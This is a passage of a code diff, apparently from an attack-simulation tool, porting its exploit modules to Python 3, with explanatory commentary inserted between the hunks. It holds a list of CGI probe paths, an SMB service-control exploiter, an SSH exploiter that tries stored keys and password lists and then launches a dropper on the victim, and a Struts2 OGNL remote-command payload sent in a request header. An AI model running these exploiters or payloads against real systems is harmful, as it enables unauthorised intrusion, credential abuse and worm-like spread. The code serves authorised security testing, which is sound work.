    r'/cgi-bin/gbook/gbook.cgi',
    r'/cgi-bin/generate.cgi',
    r'/cgi-bin/getdoc.cgi',
    r'/cgi-bin/gH.cgi',
    r'/cgi-bin/gm-authors.cgi',
    r'/cgi-bin/gm.cgi',
    r'/cgi-bin/gm-cplog.cgi',
    r'/cgi-bin/guestbook.cgi',
    r'/cgi-bin/handler',
    r'/cgi-bin/handler.cgi',
    r'/cgi-bin/handler/netsonar',
    r'/cgi-bin/hitview.cgi',
    r'/cgi-bin/hsx.cgi',
    r'/cgi-bin/html2chtml.cgi',
    r'/cgi-bin/html2wml.cgi',
    r'/cgi-bin/htsearch.cgi',
    r'/cgi-bin/hw.sh',  # testing
    r'/cgi-bin/icat',
    r'/cgi-bin/if/admin/nph-build.cgi',
    r'/cgi-bin/ikonboard/help.cgi',
    r'/cgi-bin/ImageFolio/admin/admin.cgi',
    r'/cgi-bin/imageFolio.cgi',
    r'/cgi-bin/index.cgi',
    r'/cgi-bin/infosrch.cgi',
    r'/cgi-bin/jammail.pl',
    r'/cgi-bin/journal.cgi',
    r'/cgi-bin/lastlines.cgi',
    r'/cgi-bin/loadpage.cgi',
    r'/cgi-bin/login.cgi',
    r'/cgi-bin/logit.cgi',
    r'/cgi-bin/log-reader.cgi',
    r'/cgi-bin/lookwho.cgi',
    r'/cgi-bin/lwgate.cgi',
    r'/cgi-bin/MachineInfo',
    r'/cgi-bin/MachineInfo',
    r'/cgi-bin/magiccard.cgi',
    r'/cgi-bin/mail/emumail.cgi',
    r'/cgi-bin/maillist.cgi',
    r'/cgi-bin/mailnews.cgi',
    r'/cgi-bin/mail/nph-mr.cgi',
    r'/cgi-bin/main.cgi',
    r'/cgi-bin/main_menu.pl',
    r'/cgi-bin/man.sh',
    r'/cgi-bin/mini_logger.cgi',
    r'/cgi-bin/mmstdod.cgi',
    r'/cgi-bin/moin.cgi',
    r'/cgi-bin/mojo/mojo.cgi',
    r'/cgi-bin/mrtg.cgi',
    r'/cgi-bin/mt.cgi',
    r'/cgi-bin/mt/mt.cgi',
    r'/cgi-bin/mt/mt-check.cgi',
    r'/cgi-bin/mt/mt-load.cgi',
    r'/cgi-bin/mt-static/mt-check.cgi',
    r'/cgi-bin/mt-static/mt-load.cgi',
    r'/cgi-bin/musicqueue.cgi',
    r'/cgi-bin/myguestbook.cgi',
    r'/cgi-bin/.namazu.cgi',
    r'/cgi-bin/nbmember.cgi',
    r'/cgi-bin/netauth.cgi',
    r'/cgi-bin/netpad.cgi',
    r'/cgi-bin/newsdesk.cgi',
    r'/cgi-bin/nlog-smb.cgi',
    r'/cgi-bin/nph-emumail.cgi',
    r'/cgi-bin/nph-exploitscanget.cgi',
    r'/cgi-bin/nph-publish.cgi',
    r'/cgi-bin/nph-test.cgi',
    r'/cgi-bin/pagelog.cgi',
    r'/cgi-bin/pbcgi.cgi',
    r'/cgi-bin/perlshop.cgi',
    r'/cgi-bin/pfdispaly.cgi',
    r'/cgi-bin/pfdisplay.cgi',
    r'/cgi-bin/phf.cgi',
    r'/cgi-bin/photo/manage.cgi',
    r'/cgi-bin/photo/protected/manage.cgi',
    r'/cgi-bin/php-cgi',
    r'/cgi-bin/php.cgi',
    r'/cgi-bin/php.fcgi',
    r'/cgi-bin/ping.sh',
    r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
    r'/cgi-bin/pollssi.cgi',
    r'/cgi-bin/postcards.cgi',
    r'/cgi-bin/powerup/r.cgi',
    r'/cgi-bin/printenv',
    r'/cgi-bin/probecontrol.cgi',
    r'/cgi-bin/profile.cgi',
    r'/cgi-bin/publisher/search.cgi',
    r'/cgi-bin/quickstore.cgi',
    r'/cgi-bin/quizme.cgi',
    r'/cgi-bin/ratlog.cgi',
    r'/cgi-bin/r.cgi',
    r'/cgi-bin/register.cgi',
    r'/cgi-bin/replicator/webpage.cgi/',
    r'/cgi-bin/responder.cgi',
    r'/cgi-bin/robadmin.cgi',
    r'/cgi-bin/robpoll.cgi',
    r'/cgi-bin/rtpd.cgi',
    r'/cgi-bin/sbcgi/sitebuilder.cgi',
    r'/cgi-bin/scoadminreg.cgi',
    r'/cgi-bin-sdb/printenv',
    r'/cgi-bin/sdbsearch.cgi',
    r'/cgi-bin/search',
    r'/cgi-bin/search.cgi',
    r'/cgi-bin/search/search.cgi',
    r'/cgi-bin/sendform.cgi',
    r'/cgi-bin/shop.cgi',
    r'/cgi-bin/shopper.cgi',
    r'/cgi-bin/shopplus.cgi',
    r'/cgi-bin/showcheckins.cgi',
    r'/cgi-bin/simplestguest.cgi',
    r'/cgi-bin/simplestmail.cgi',
    r'/cgi-bin/smartsearch.cgi',
    r'/cgi-bin/smartsearch/smartsearch.cgi',
    r'/cgi-bin/snorkerz.bat',
    r'/cgi-bin/snorkerz.bat',
    r'/cgi-bin/snorkerz.cmd',
    r'/cgi-bin/snorkerz.cmd',
    r'/cgi-bin/sojourn.cgi',
    r'/cgi-bin/spin_client.cgi',
    r'/cgi-bin/start.cgi',
    r'/cgi-bin/status',
    r'/cgi-bin/status_cgi',
    r'/cgi-bin/store/agora.cgi',
    r'/cgi-bin/store.cgi',
    r'/cgi-bin/store/index.cgi',
    r'/cgi-bin/survey.cgi',
    r'/cgi-bin/sync.cgi',
    r'/cgi-bin/talkback.cgi',
    r'/cgi-bin/technote/main.cgi',
    r'/cgi-bin/test2.pl',
    r'/cgi-bin/test-cgi',
    r'/cgi-bin/test.cgi',
    r'/cgi-bin/testing_whatever',
    r'/cgi-bin/test/test.cgi',
    r'/cgi-bin/tidfinder.cgi',
    r'/cgi-bin/tigvote.cgi',
    r'/cgi-bin/title.cgi',
    r'/cgi-bin/top.cgi',
    r'/cgi-bin/traffic.cgi',
    r'/cgi-bin/troops.cgi',
    r'/cgi-bin/ttawebtop.cgi/',
    r'/cgi-bin/ultraboard.cgi',
    r'/cgi-bin/upload.cgi',
    r'/cgi-bin/urlcount.cgi',
    r'/cgi-bin/viewcvs.cgi',
    r'/cgi-bin/view_help.cgi',
    r'/cgi-bin/viralator.cgi',
    r'/cgi-bin/virgil.cgi',
    r'/cgi-bin/vote.cgi',
    r'/cgi-bin/vpasswd.cgi',
    r'/cgi-bin/way-board.cgi',
    r'/cgi-bin/way-board/way-board.cgi',
    r'/cgi-bin/webbbs.cgi',
    r'/cgi-bin/webcart/webcart.cgi',
    r'/cgi-bin/webdist.cgi',
    r'/cgi-bin/webif.cgi',
    r'/cgi-bin/webmail/html/emumail.cgi',
    r'/cgi-bin/webmap.cgi',
    r'/cgi-bin/webspirs.cgi',
    r'/cgi-bin/Web_Store/web_store.cgi',
    r'/cgi-bin/whois.cgi',
    r'/cgi-bin/whois_raw.cgi',
    r'/cgi-bin/whois/whois.cgi',
    r'/cgi-bin/wrap',
    r'/cgi-bin/wrap.cgi',
    r'/cgi-bin/wwwboard.cgi.cgi',
    r'/cgi-bin/YaBB/YaBB.cgi',
    r'/cgi-bin/zml.cgi',
    r'/cgi-mod/index.cgi',
    r'/cgis/wwwboard/wwwboard.cgi',
    r'/cgi-sys/addalink.cgi',
    r'/cgi-sys/defaultwebpage.cgi',
    r'/cgi-sys/domainredirect.cgi',
    r'/cgi-sys/entropybanner.cgi',
    r'/cgi-sys/entropysearch.cgi',
    r'/cgi-sys/FormMail-clone.cgi',
    r'/cgi-sys/helpdesk.cgi',
    r'/cgi-sys/mchat.cgi',
    r'/cgi-sys/randhtml.cgi',
    r'/cgi-sys/realhelpdesk.cgi',
    r'/cgi-sys/realsignup.cgi',
    r'/cgi-sys/signup.cgi',
    r'/connector.cgi',
    r'/cp/rac/nsManager.cgi',
    r'/create_release.sh',
    r'/CSNews.cgi',
    r'/csPassword.cgi',
    r'/dcadmin.cgi',
    r'/dcboard.cgi',
    r'/dcforum.cgi',
    r'/dcforum/dcforum.cgi',
    r'/debuff.cgi',
    r'/debug.cgi',
    r'/details.cgi',
    r'/edittag/edittag.cgi',
    r'/emumail.cgi',
    r'/enter_buff.cgi',
    r'/enter_bug.cgi',
    r'/ez2000/ezadmin.cgi',
    r'/ez2000/ezboard.cgi',
    r'/ez2000/ezman.cgi',
    r'/fcgi-bin/echo',
    r'/fcgi-bin/echo',
    r'/fcgi-bin/echo2',
    r'/fcgi-bin/echo2',
    r'/Gozila.cgi',
    r'/hitmatic/analyse.cgi',
    r'/hp_docs/cgi-bin/index.cgi',
    r'/html/cgi-bin/cgicso',
    r'/html/cgi-bin/cgicso',
    r'/index.cgi',
    r'/info.cgi',
    r'/infosrch.cgi',
    r'/login.cgi',
    r'/mailview.cgi',
    r'/main.cgi',
    r'/megabook/admin.cgi',
    r'/ministats/admin.cgi',
    r'/mods/apage/apage.cgi',
    r'/_mt/mt.cgi',
    r'/musicqueue.cgi',
    r'/ncbook.cgi',
    r'/newpro.cgi',
    r'/newsletter.sh',
    r'/oem_webstage/cgi-bin/oemapp_cgi',
    r'/page.cgi',
    r'/parse_xml.cgi',
    r'/photodata/manage.cgi',
    r'/photo/manage.cgi',
    r'/print.cgi',
    r'/process_buff.cgi',
    r'/process_bug.cgi',
    r'/pub/english.cgi',
    r'/quikmail/nph-emumail.cgi',
    r'/quikstore.cgi',
    r'/reviews/newpro.cgi',
    r'/ROADS/cgi-bin/search.pl',
    r'/sample01.cgi',
    r'/sample02.cgi',
    r'/sample03.cgi',
    r'/sample04.cgi',
    r'/sampleposteddata.cgi',
    r'/scancfg.cgi',
    r'/scancfg.cgi',
    r'/servers/link.cgi',
    r'/setpasswd.cgi',
    r'/SetSecurity.shm',
    r'/shop/member_html.cgi',
    r'/shop/normal_html.cgi',
    r'/site_searcher.cgi',
    r'/siteUserMod.cgi',
    r'/submit.cgi',
    r'/technote/print.cgi',
    r'/template.cgi',
    r'/test.cgi',
    r'/ucsm/isSamInstalled.cgi',
    r'/upload.cgi',
    r'/userreg.cgi',
    r'/users/scripts/submit.cgi',
    r'/vood/cgi-bin/vood_view.cgi',
    r'/Web_Store/web_store.cgi',
    r'/webtools/bonsai/ccvsblame.cgi',
    r'/webtools/bonsai/cvsblame.cgi',
    r'/webtools/bonsai/cvslog.cgi',
    r'/webtools/bonsai/cvsquery.cgi',
    r'/webtools/bonsai/cvsqueryform.cgi',
    r'/webtools/bonsai/showcheckins.cgi',
    r'/wwwadmin.cgi',
    r'/wwwboard.cgi',
-             r'/wwwboard/wwwboard.cgi')
+    r'/wwwboard/wwwboard.cgi'
+)


@@ -3,11 +3,11 @@ from logging import getLogger
 from impacket.dcerpc.v5 import transport, scmr
 from impacket.smbconnection import SMB_DIALECT
-from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
 from infection_monkey.exploit.tools.smb_tools import SmbTools
 from infection_monkey.model import MONKEY_CMDLINE_DETACHED_WINDOWS, DROPPER_CMDLINE_DETACHED_WINDOWS
-from infection_monkey.network import SMBFinger
+from infection_monkey.network.smbfinger import SMBFinger
 from infection_monkey.network.tools import check_tcp_port
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.telemetry.attack.t1035_telem import T1035Telem

@@ -108,16 +108,15 @@ class SmbExploiter(HostExploiter):
         cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
                   build_monkey_commandline(self.host, get_monkey_depth() - 1)

+        smb_conn = False
         for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
             rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
             rpctransport.set_dport(port)
             if hasattr(rpctransport, 'preferred_dialect'):
                 rpctransport.preferred_dialect(SMB_DIALECT)
             if hasattr(rpctransport, 'set_credentials'):
                 # This method exists only for selected protocol sequences.
-                rpctransport.set_credentials(user, password, '',
-                                             lm_hash, ntlm_hash, None)
+                rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
             rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)

             scmr_rpc = rpctransport.get_dce_rpc()

@@ -125,13 +124,14 @@ class SmbExploiter(HostExploiter):
             try:
                 scmr_rpc.connect()
             except Exception as exc:
-                LOG.warn("Error connecting to SCM on exploited machine %r: %s",
-                         self.host, exc)
-                return False
+                LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc)
+                continue

             smb_conn = rpctransport.get_smb_connection()
             break

+        if not smb_conn:
+            return False
+
         # We don't wanna deal with timeouts from now on.
         smb_conn.setTimeout(100000)
         scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
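
The reworked SMB loop swaps "fail on first error" for "try every known protocol binding": a failed connect now logs and continues, and only after the loop does the code bail out if nothing connected. A generic sketch of that pattern (the names are illustrative, not the Monkey API):

```python
def connect_first(candidates, connect):
    """Try each candidate in order; return the first successful connection."""
    conn = None
    for candidate in candidates:
        try:
            conn = connect(candidate)
        except OSError:
            continue  # this candidate failed; try the next one
        break
    # None mirrors the post-loop `if not smb_conn: return False` check.
    return conn
```

The key point of the refactor is that the `return False` moved from inside the `except` (which aborted on the first bad protocol) to after the loop, where it only fires once every candidate has been exhausted.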


@@ -1,16 +1,15 @@
-import StringIO
+import io
 import logging
 import time

 import paramiko

 import infection_monkey.monkeyfs as monkeyfs
-from common.utils.exploit_enum import ExploitType
-from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
-from infection_monkey.exploit.tools.helpers import get_interface_to_target
 from infection_monkey.model import MONKEY_ARG
-from infection_monkey.network.tools import check_tcp_port
+from infection_monkey.network.tools import check_tcp_port, get_interface_to_target
+from infection_monkey.exploit.tools.exceptions import FailedExploitationError
 from common.utils.exploit_enum import ExploitType
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.telemetry.attack.t1105_telem import T1105Telem

@@ -38,15 +37,16 @@ class SSHExploiter(HostExploiter):
         LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
         self._update_timestamp = time.time()

-    def exploit_with_ssh_keys(self, port, ssh):
+    def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
         user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
-        exploited = False
         for user, ssh_key_pair in user_ssh_key_pairs:
             # Creating file-like private key for paramiko
-            pkey = StringIO.StringIO(ssh_key_pair['private_key'])
+            pkey = io.StringIO(ssh_key_pair['private_key'])
             ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
+            ssh = paramiko.SSHClient()
+            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
                 pkey = paramiko.RSAKey.from_private_key(pkey)
             except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):

@@ -55,56 +55,53 @@ class SSHExploiter(HostExploiter):
                 ssh.connect(self.host.ip_addr,
                             username=user,
                             pkey=pkey,
-                            port=port,
-                            timeout=None)
+                            port=port)
                 LOG.debug("Successfully logged in %s using %s users private key",
                           self.host, ssh_string)
-                exploited = True
                 self.report_login_attempt(True, user, ssh_key=ssh_string)
-                break
-            except Exception as exc:
+                return ssh
+            except Exception:
+                ssh.close()
                 LOG.debug("Error logging into victim %r with %s"
                           " private key", self.host,
                           ssh_string)
                 self.report_login_attempt(False, user, ssh_key=ssh_string)
                 continue
-        return exploited
+        raise FailedExploitationError

-    def exploit_with_login_creds(self, port, ssh):
+    def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
         user_password_pairs = self._config.get_exploit_user_password_pairs()
-        exploited = False
         for user, current_password in user_password_pairs:
+            ssh = paramiko.SSHClient()
+            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
             try:
                 ssh.connect(self.host.ip_addr,
                             username=user,
                             password=current_password,
-                            port=port,
-                            timeout=None)
+                            port=port)
                 LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
                           self.host, user, self._config.hash_sensitive_data(current_password))
-                exploited = True
                 self.add_vuln_port(port)
                 self.report_login_attempt(True, user, current_password)
-                break
+                return ssh
             except Exception as exc:
                 LOG.debug("Error logging into victim %r with user"
                           " %s and password (SHA-512) '%s': (%s)", self.host,
                           user, self._config.hash_sensitive_data(current_password), exc)
                 self.report_login_attempt(False, user, current_password)
+                ssh.close()
                 continue
-        return exploited
+        raise FailedExploitationError

     def _exploit_host(self):
-        ssh = paramiko.SSHClient()
-        ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
         port = SSH_PORT
         # if ssh banner found on different port, use that port.
-        for servkey, servdata in self.host.services.items():
+        for servkey, servdata in list(self.host.services.items()):
             if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
                 port = int(servkey.replace('tcp-', ''))

@@ -113,19 +110,19 @@ class SSHExploiter(HostExploiter):
             LOG.info("SSH port is closed on %r, skipping", self.host)
             return False

-        # Check for possible ssh exploits
-        exploited = self.exploit_with_ssh_keys(port, ssh)
-        if not exploited:
-            exploited = self.exploit_with_login_creds(port, ssh)
-
-        if not exploited:
-            LOG.debug("Exploiter SSHExploiter is giving up...")
-            return False
+        try:
+            ssh = self.exploit_with_ssh_keys(port)
+        except FailedExploitationError:
+            try:
+                ssh = self.exploit_with_login_creds(port)
+            except FailedExploitationError:
+                LOG.debug("Exploiter SSHExploiter is giving up...")
+                return False

         if not self.host.os.get('type'):
             try:
                 _, stdout, _ = ssh.exec_command('uname -o')
-                uname_os = stdout.read().lower().strip()
+                uname_os = stdout.read().lower().strip().decode()
                 if 'linux' in uname_os:
                     self.host.os['type'] = 'linux'
                 else:

@@ -138,7 +135,7 @@ class SSHExploiter(HostExploiter):
         if not self.host.os.get('machine'):
             try:
                 _, stdout, _ = ssh.exec_command('uname -m')
-                uname_machine = stdout.read().lower().strip()
+                uname_machine = stdout.read().lower().strip().decode()
                 if '' != uname_machine:
                     self.host.os['machine'] = uname_machine
             except Exception as exc:

@@ -183,7 +180,7 @@ class SSHExploiter(HostExploiter):
         try:
             cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
             cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1)
-            cmdline += "&"
+            cmdline += " > /dev/null 2>&1 &"
             ssh.exec_command(cmdline)
             LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
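
Most of the SSH changes are Python 2-to-3 fixes: `StringIO.StringIO` becomes `io.StringIO`, and remote command output arrives as bytes, hence the added `.decode()` calls. A small illustration of both points (the key text and the captured output are placeholders, not real data):

```python
import io

# StringIO.StringIO -> io.StringIO: paramiko's RSAKey.from_private_key() only
# needs a file-like object, which io.StringIO provides in Python 3.
pkey_file = io.StringIO("-----BEGIN RSA PRIVATE KEY-----\n(placeholder)\n")
assert pkey_file.readline().startswith("-----BEGIN")

# In Python 3, reading a channel's stdout yields bytes, so 'uname -o' output
# must be decoded before comparing against str literals like 'linux'.
raw_stdout = b"GNU/Linux\n"
uname_os = raw_stdout.lower().strip().decode()
assert 'linux' in uname_os
```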


@@ -3,13 +3,14 @@
 code used is from https://www.exploit-db.com/exploits/41570/
 Vulnerable struts2 versions <=2.3.31 and <=2.5.10
 """
-import urllib2
-import httplib
-import unicodedata
+import http.client
+import logging
 import re
 import ssl
-import logging
+import urllib.error
+import urllib.parse
+import urllib.request

 from infection_monkey.exploit.web_rce import WebRCE

 __author__ = "VakarisZ"

@@ -47,10 +48,10 @@ class Struts2Exploiter(WebRCE):
     def get_redirected(url):
         # Returns false if url is not right
         headers = {'User-Agent': 'Mozilla/5.0'}
-        request = urllib2.Request(url, headers=headers)
+        request = urllib.request.Request(url, headers=headers)
         try:
-            return urllib2.urlopen(request, context=ssl._create_unverified_context()).geturl()
-        except urllib2.URLError:
+            return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl()
+        except urllib.error.URLError:
             LOG.error("Can't reach struts2 server")
             return False

@@ -79,18 +80,15 @@ class Struts2Exploiter(WebRCE):
                   "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
                   "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
                   "(#ros.flush())}" % cmd
-        # Turns payload ascii just for consistency
-        if isinstance(payload, unicode):
-            payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
         try:
-            request = urllib2.Request(url, headers=headers)
+            request = urllib.request.Request(url, headers=headers)
             # Timeout added or else we would wait for all monkeys' output
-            page = urllib2.urlopen(request).read()
+            page = urllib.request.urlopen(request).read()
         except AttributeError:
             # If url does not exist
             return False
-        except httplib.IncompleteRead as e:
-            page = e.partial
+        except http.client.IncompleteRead as e:
+            page = e.partial.decode()
         return page
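
The Struts2 changes are the standard Python 3 stdlib renames: `urllib2` splits into `urllib.request`/`urllib.error`, and `httplib` becomes `http.client`. A quick sketch of the mapping on plain stdlib objects (the example.com URL is illustrative; nothing is fetched over the network):

```python
import http.client
import urllib.error
import urllib.request

# urllib2.Request -> urllib.request.Request (constructing one does no I/O)
request = urllib.request.Request('http://example.com/',
                                 headers={'User-Agent': 'Mozilla/5.0'})
assert request.get_header('User-agent') == 'Mozilla/5.0'

# httplib.IncompleteRead -> http.client.IncompleteRead; .partial holds the
# bytes read so far, which is why the diff adds .decode() to get a str page.
err = http.client.IncompleteRead(b'partial body')
assert err.partial.decode() == 'partial body'

# urllib2.URLError -> urllib.error.URLError (an OSError subclass in Python 3)
assert issubclass(urllib.error.URLError, OSError)
```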

Some files were not shown because too many files have changed in this diff.